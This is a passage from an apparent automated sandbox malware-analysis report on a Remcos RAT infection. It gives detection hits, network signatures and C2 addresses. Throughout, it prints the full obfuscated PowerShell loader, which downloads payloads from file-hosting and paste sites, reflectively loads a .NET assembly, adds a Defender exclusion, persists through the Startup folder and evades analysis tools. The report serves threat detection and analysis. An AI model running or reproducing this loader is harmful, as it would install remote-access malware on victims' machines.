([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu'
              Sigma detected: PowerShell Web Download
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$LTkZZ = $host.Version.Major.Equals(2);If ( $LTkZZ ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $EhgVw ) {$ngsdp = $menos ;}else {$ngsdp = ($ngsdp) ;};$ykhyn = ( New-Object Net.WebClient ) ;$ykhyn.Encoding = [System.Text.Encoding]::UTF8 ;$ykhyn.DownloadFile($ngsdp, ($fbKNY + '\Upwin.msu') ) ;$fVDsW = ( 'C:\Users\' + [Environment]::UserName );$bJTXj = ( $fbKNY + '\Upwin.msu' ) ; powershell.exe wusa.exe $bJTXj /quiet /norestart ; Copy-Item 'C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js' -Destination ( $fVDsW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$Stringbase;Function BaseMy{;$EATVh = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $EATVh;};$nhqvr = ('https://pastebin.com/raw/bYrRPs5M' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$vfjrD = $webClient.DownloadString( $nhqvr ) ;$Stringbase = $vfjrD; $vfjrD = BaseMy;$vfjrD | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$lyjkG = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$BKrSR = New-Object System.Net.WebClient ;$BKrSR.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$lDMXc = $BKrSR.DownloadData( $nFuQG ) ;$SXRcf = [System.Text.Encoding]::UTF8.GetString($lDMXc);$SXRcf | Out-File -FilePath $lyjkG -force ;$EuTZA = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'') ;$ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$EuTZA += '[Byte[]] $EATVh = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$EuTZA += '[System.AppDomain]:' + ':CurrentDomain.Load( $EATVh ).' ;$EuTZA += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$EuTZA += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''txt.5202-YzX-dAeRpS-MeR/moc.seplaenohreruemed//:sptth'' , ''C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\addinprocess32'' ) );';$XvCTi = ([System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$EuTZA | Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$LTkZZ = $host.Version.Major.Equals(2);If ( $LTkZZ ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu'
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell $S = 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine: powershell $S = 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7308, ParentProcessName: powershell.exe, ProcessCommandLine: powershell $S = 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\' ; Add-MpPreference -ExclusionPath $S -force ;, ProcessId: 7696, ProcessName: powershell.exe
              Sigma detected: Suspicious Copy From or To System Directory
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$LTkZZ = $host.Version.Major.Equals(2);If ( $LTkZZ ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $EhgVw ) {$ngsdp = $menos ;}else {$ngsdp = ($ngsdp) ;};$ykhyn = ( New-Object Net.WebClient ) ;$ykhyn.Encoding = [System.Text.Encoding]::UTF8 ;$ykhyn.DownloadFile($ngsdp, ($fbKNY + '\Upwin.msu') ) ;$fVDsW = ( 'C:\Users\' + [Environment]::UserName );$bJTXj = ( $fbKNY + '\Upwin.msu' ) ; powershell.exe wusa.exe $bJTXj /quiet /norestart ; Copy-Item 'C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js' -Destination ( $fVDsW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$Stringbase;Function BaseMy{;$EATVh = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $EATVh;};$nhqvr = ('https://pastebin.com/raw/bYrRPs5M' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$vfjrD = $webClient.DownloadString( $nhqvr ) ;$Stringbase = $vfjrD; $vfjrD = BaseMy;$vfjrD | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$lyjkG = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$BKrSR = New-Object System.Net.WebClient ;$BKrSR.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$lDMXc = $BKrSR.DownloadData( $nFuQG ) ;$SXRcf = [System.Text.Encoding]::UTF8.GetString($lDMXc);$SXRcf | Out-File -FilePath $lyjkG -force ;$EuTZA = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'') ;$ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$EuTZA += '[Byte[]] $EATVh = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$EuTZA += '[System.AppDomain]:' + ':CurrentDomain.Load( $EATVh ).' ;$EuTZA += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$EuTZA += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''txt.5202-YzX-dAeRpS-MeR/moc.seplaenohreruemed//:sptth'' , ''C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\addinprocess32'' ) );';$XvCTi = ([System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$EuTZA | Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$LTkZZ = $host.Version.Major.Equals(2);If ( $LTkZZ ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu'
              Sigma detected: Usage Of Web Request Commands And Cmdlets
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$LTkZZ = $host.Version.Major.Equals(2);If ( $LTkZZ ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $EhgVw ) {$ngsdp = $menos ;}else {$ngsdp = ($ngsdp) ;};$ykhyn = ( New-Object Net.WebClient ) ;$ykhyn.Encoding = [System.Text.Encoding]::UTF8 ;$ykhyn.DownloadFile($ngsdp, ($fbKNY + '\Upwin.msu') ) ;$fVDsW = ( 'C:\Users\' + [Environment]::UserName );$bJTXj = ( $fbKNY + '\Upwin.msu' ) ; powershell.exe wusa.exe $bJTXj /quiet /norestart ; Copy-Item 'C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js' -Destination ( $fVDsW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$Stringbase;Function BaseMy{;$EATVh = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $EATVh;};$nhqvr = ('https://pastebin.com/raw/bYrRPs5M' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$vfjrD = $webClient.DownloadString( $nhqvr ) ;$Stringbase = $vfjrD; $vfjrD = BaseMy;$vfjrD | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$lyjkG = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$BKrSR = New-Object System.Net.WebClient ;$BKrSR.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$lDMXc = $BKrSR.DownloadData( $nFuQG ) ;$SXRcf = [System.Text.Encoding]::UTF8.GetString($lDMXc);$SXRcf | Out-File -FilePath $lyjkG -force ;$EuTZA = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'') ;$ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$EuTZA += '[Byte[]] $EATVh = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$EuTZA += '[System.AppDomain]:' + ':CurrentDomain.Load( $EATVh ).' ;$EuTZA += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$EuTZA += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''txt.5202-YzX-dAeRpS-MeR/moc.seplaenohreruemed//:sptth'' , ''C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\addinprocess32'' ) );';$XvCTi = ([System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$EuTZA | Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$LTkZZ = $host.Version.Major.Equals(2);If ( $LTkZZ ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu'
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4552, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js" , ProcessId: 8136, ProcessName: wscript.exe
              Sigma detected: Local Accounts Discovery
              Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: cmd.exe /c mkdir "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\", CommandLine: cmd.exe /c mkdir "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7308, ParentProcessName: powershell.exe, ProcessCommandLine: cmd.exe /c mkdir "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\", ProcessId: 3760, ProcessName: cmd.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $WgkXZ = 'JA' + [char]66 + 'MAFQAaw' + [char]66 + 'aAFoAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQATA' + [char]66 + 'UAGsAWg' + [char]66 + 'aACAAKQAgAHsAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAA9ACAAKA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACkAOw' + [char]66 + 'kAGUAbAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQA7ACQAbg' + [char]66 + 'nAHMAZA' + [char]66 + 'wACAAPQAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGYAaQ' + [char]66 + 'sAGUAcwAuAGMAYQ' + [char]66 + '0AGIAbw' + [char]66 + '4AC4AbQ' + [char]66 + 'vAGUALw' + [char]66 + 'zAGEAaw' + [char]66 + '1AHUAbwAuAG0Acw' + [char]66 + '1ACcAOwAkAG0AZQ' + [char]66 + 'uAG8AcwAgAD0AIAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'mAGkAbA' + [char]66 + 'lAHMALg' + [char]66 + 'jAGEAdA' + [char]66 + 'iAG8AeAAuAG0Abw' + [char]66 + 'lAC8ANg' + [char]66 + 'zAGQAag' + [char]66 + 'jADUALg' + [char]66 + 'tAHMAdQAnADsAJA' + [char]66 + 'FAGgAZw' + [char]66 + 'WAHcAIAA9ACAAJA' + [char]66 + 'lAG4AdgA6AFAAUg' + [char]66 + 'PAEMARQ' + [char]66 + 'TAFMATw' + [char]66 + 'SAF8AQQ' + [char]66 + 'SAEMASA' + [char]66 + 'JAFQARQ' + [char]66 + 'DAFQAVQ' + [char]66 + 'SAEUALg' + [char]66 + 'DAG8Abg' + [char]66 + '0AGEAaQ' + [char]66 + 'uAHMAKAAnADYANAAnACkAOw' + [char]66 + 'pAGYAIAAoACAAJA' + [char]66 + 'FAGgAZw' + [char]66 + 'WAHcAIAApACAAewAkAG4AZw' + [char]66 + 'zAGQAcAAgAD0AIAAkAG0AZQ' + [char]66 + 'uAG8AcwAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAG4AZw' + [char]66 + 'zAGQAcAAgAD0AIAAoACQAbg' + [char]66 + 'nAHMAZA' + [char]66 + 'wACkAIAA7AH0AOwAkAHkAaw' + [char]66 + 'oAHkAbgAgAD0AIAAoACAATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAApACAAOwAkAHkAaw' + [char]66 + 'oAHkAbgAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4ACAAOwAkAHkAaw' + [char]66 + 'oAHkAbgAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'GAGkAbA' + [char]66 + 'lACgAJA' + [char]66 + 'uAGcAcw' + [char]66 + 'kAHAALAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQAgACkAIAA7ACQAZg' + [char]66 + 'WAEQAcw' + [char]66 + 'XACAAPQAgACgAIAAnAEMAOg' +
              Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2980, TargetFilename: C:\Users\user\AppData\Local\Temp\dll03.ps1

              Persistence and Installation Behavior

              barindex
              Sigma detected: Copy file to startup via Powershell
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$LTkZZ = $host.Version.Major.Equals(2);If ( $LTkZZ ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $EhgVw ) {$ngsdp = $menos ;}else {$ngsdp = ($ngsdp) ;};$ykhyn = ( New-Object Net.WebClient ) ;$ykhyn.Encoding = [System.Text.Encoding]::UTF8 ;$ykhyn.DownloadFile($ngsdp, ($fbKNY + '\Upwin.msu') ) ;$fVDsW = ( 'C:\Users\' + [Environment]::UserName );$bJTXj = ( $fbKNY + '\Upwin.msu' ) ; powershell.exe wusa.exe $bJTXj /quiet /norestart ; Copy-Item 'C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js' -Destination ( $fVDsW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$Stringbase;Function BaseMy{;$EATVh = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $EATVh;};$nhqvr = ('https://pastebin.com/raw/bYrRPs5M' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$vfjrD = $webClient.DownloadString( $nhqvr ) ;$Stringbase = $vfjrD; $vfjrD = BaseMy;$vfjrD | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$lyjkG = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$BKrSR = New-Object System.Net.WebClient ;$BKrSR.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$lDMXc = $BKrSR.DownloadData( $nFuQG ) ;$SXRcf = [System.Text.Encoding]::UTF8.GetString($lDMXc);$SXRcf | Out-File -FilePath $lyjkG -force ;$EuTZA = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'') ;$ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$EuTZA += '[Byte[]] $EATVh = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$EuTZA += '[System.AppDomain]:' + ':CurrentDomain.Load( $EATVh ).' ;$EuTZA += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$EuTZA += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''txt.5202-YzX-dAeRpS-MeR/moc.seplaenohreruemed//:sptth'' , ''C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\addinprocess32'' ) );';$XvCTi = ([System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$EuTZA | Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$LTkZZ = $host.Version.Major.Equals(2);If ( $LTkZZ ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu'

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-13T08:41:31.147130+010020204251Exploit Kit Activity Detected64.235.43.128443192.168.2.1760227TCP
              2025-02-13T08:41:39.823013+010020204251Exploit Kit Activity Detected64.235.43.128443192.168.2.1760234TCP
              2025-02-13T08:41:42.395414+010020204251Exploit Kit Activity Detected64.235.43.128443192.168.2.1760237TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-13T08:41:31.147130+010020204241Exploit Kit Activity Detected64.235.43.128443192.168.2.1760227TCP
              2025-02-13T08:41:39.823013+010020204241Exploit Kit Activity Detected64.235.43.128443192.168.2.1760234TCP
              2025-02-13T08:41:42.395414+010020204241Exploit Kit Activity Detected64.235.43.128443192.168.2.1760237TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-13T08:41:53.206499+010020365941Malware Command and Control Activity Detected192.168.2.176025046.246.86.122404TCP
              2025-02-13T08:41:55.354621+010020365941Malware Command and Control Activity Detected192.168.2.176025246.246.86.122404TCP
              2025-02-13T08:41:55.417610+010020365941Malware Command and Control Activity Detected192.168.2.176025146.246.86.122404TCP
              2025-02-13T08:42:04.919504+010020365941Malware Command and Control Activity Detected192.168.2.176025946.246.86.122404TCP
              2025-02-13T08:42:05.374505+010020365941Malware Command and Control Activity Detected192.168.2.176026146.246.86.122404TCP
              2025-02-13T08:42:08.552564+010020365941Malware Command and Control Activity Detected192.168.2.176026246.246.86.122404TCP
              2025-02-13T08:42:27.264112+010020365941Malware Command and Control Activity Detected192.168.2.176030346.246.86.122404TCP
              2025-02-13T08:42:44.915697+010020365941Malware Command and Control Activity Detected192.168.2.176030946.246.86.122404TCP
              2025-02-13T08:42:54.029775+010020365941Malware Command and Control Activity Detected192.168.2.176031946.246.86.122404TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-13T08:41:31.954571+010020576351A Network Trojan was detected64.235.43.128443192.168.2.1760227TCP
              2025-02-13T08:41:40.634411+010020576351A Network Trojan was detected64.235.43.128443192.168.2.1760234TCP
              2025-02-13T08:41:43.197187+010020576351A Network Trojan was detected64.235.43.128443192.168.2.1760237TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-13T08:41:32.935736+010028033053Unknown Traffic192.168.2.1760228104.20.3.235443TCP
              2025-02-13T08:41:33.742148+010028033053Unknown Traffic192.168.2.176023123.186.113.60443TCP
              2025-02-13T08:41:39.430253+010028033053Unknown Traffic192.168.2.1760235104.20.3.235443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-13T08:41:55.365125+010028033043Unknown Traffic192.168.2.1760253178.237.33.5080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-13T08:41:31.954571+010028582951A Network Trojan was detected64.235.43.128443192.168.2.1760227TCP
              2025-02-13T08:41:40.634411+010028582951A Network Trojan was detected64.235.43.128443192.168.2.1760234TCP
              2025-02-13T08:41:43.197187+010028582951A Network Trojan was detected64.235.43.128443192.168.2.1760237TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-13T08:41:22.790500+010028410751Malware Command and Control Activity Detected192.168.2.176022423.186.113.60443TCP
              2025-02-13T08:41:28.882567+010028410751Malware Command and Control Activity Detected192.168.2.176022623.186.113.60443TCP
              2025-02-13T08:41:33.742148+010028410751Malware Command and Control Activity Detected192.168.2.176023123.186.113.60443TCP
              2025-02-13T08:41:33.753538+010028410751Malware Command and Control Activity Detected192.168.2.176023023.186.113.60443TCP
              2025-02-13T08:41:37.749134+010028410751Malware Command and Control Activity Detected192.168.2.176023323.186.113.60443TCP
              2025-02-13T08:41:40.330732+010028410751Malware Command and Control Activity Detected192.168.2.176023623.186.113.60443TCP
              2025-02-13T08:41:42.087039+010028410751Malware Command and Control Activity Detected192.168.2.176024123.186.113.60443TCP
              2025-02-13T08:41:44.633601+010028410751Malware Command and Control Activity Detected192.168.2.176024423.186.113.60443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: https://demeurerhonealpes.com/ReM-SpReAd-XzY-2025.txtAvira URL Cloud: Label: malware
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000053.00000002.2233264919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000053.00000002.2258901660.0000000001397000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              Exploits

              barindex
              Yara detected UAC Bypass using CMSTP
              Source: Yara matchFile source: 00000053.00000002.2233264919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: https://drive.google.com/file/d/1FVDnmU54G6_GaADSmojqRgpCVK0Y1U9s/viewHTTP Parser: No favicon
              Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.17:60223 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.17:60224 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.17:60225 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.17:60226 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 64.235.43.128:443 -> 192.168.2.17:60227 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.17:60229 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.17:60230 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.17:60232 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.17:60233 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 64.235.43.128:443 -> 192.168.2.17:60234 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.17:60248 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.17:60249 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.17:60270 version: TLS 1.2
